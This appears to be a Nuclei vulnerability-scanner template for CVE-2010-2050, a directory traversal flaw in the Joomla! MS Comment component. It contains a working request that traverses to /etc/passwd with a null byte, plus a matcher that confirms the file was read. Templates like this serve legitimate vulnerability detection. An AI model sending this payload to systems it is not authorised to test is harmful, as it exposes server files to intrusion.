nuclei-templates/http/cves/2010/CVE-2010-2050.yaml

42 lines
1.4 KiB
YAML

id: CVE-2010-2050
info:
name: Joomla! Component MS Comment 0.8.0b - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in the Moron Solutions MS Comment (com_mscomment) component 0.8.0b for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12611
- https://nvd.nist.gov/vuln/detail/CVE-2010-2050
- http://packetstormsecurity.org/1005-exploits/joomlamscomment-lfi.txt
- http://www.vupen.com/english/advisories/2010/1159
- https://exchange.xforce.ibmcloud.com/vulnerabilities/58619
remediation: Upgrade to a supported version.
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
cvss-score: 7.5
cve-id: CVE-2010-2050
cwe-id: CWE-22
epss-score: 0.03527
cpe: cpe:2.3:a:m0r0n:com_mscomment:0.8.0:b:*:*:*:*:*:*
metadata:
max-request: 1
vendor: m0r0n
product: com_mscomment
tags: cve2010,joomla,lfi,edb,packetstorm,cve
http:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200